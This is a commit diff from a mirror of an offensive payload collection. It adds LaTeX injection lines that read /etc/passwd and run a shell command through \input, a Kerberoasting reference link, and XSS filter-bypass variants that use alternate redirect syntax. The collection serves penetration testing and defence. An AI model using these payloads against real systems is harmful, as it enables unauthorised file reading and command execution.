mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
LaTeX display code + XSS location alternative
This commit is contained in:
parent
dcc5ebd3b6
commit
644724396f
@ -26,6 +26,13 @@ Read multiple lined file
|
||||
\closein\file
|
||||
```
|
||||
|
||||
Read text file, keep the formatting
|
||||
```bash
|
||||
\usepackage{verbatim}
|
||||
\verbatiminput{/etc/passwd}
|
||||
```
|
||||
|
||||
|
||||
## Write file
|
||||
```bash
|
||||
\newwrite\outfile
|
||||
@ -48,6 +55,7 @@ If you get any LaTex error, consider using base64 to get the result without bad
|
||||
|
||||
```bash
|
||||
\input|ls|base4
|
||||
\input{|"/bin/hostname"}
|
||||
```
|
||||
|
||||
|
||||
|
@ -278,6 +278,7 @@ TODO
|
||||
|
||||
### Kerberoast
|
||||
```c
|
||||
https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf
|
||||
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
|
||||
https://room362.com/post/2016/kerberoast-pt1/
|
||||
|
||||
|
@ -424,6 +424,14 @@ foo="text </script><script>alert(1)</script>";
|
||||
</script>
|
||||
```
|
||||
|
||||
Bypass using an alternate way to redirect
|
||||
```javascript
|
||||
location="http://google.com"
|
||||
document.location = "http://google.com"
|
||||
document.location.href="http://google.com"
|
||||
window.location.assign("http://google.com")
|
||||
window['location']['href']="http://google.com"
|
||||
```
|
||||
|
||||
Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
|
||||
```javascript
|
||||
|
Loading…
Reference in New Issue
Block a user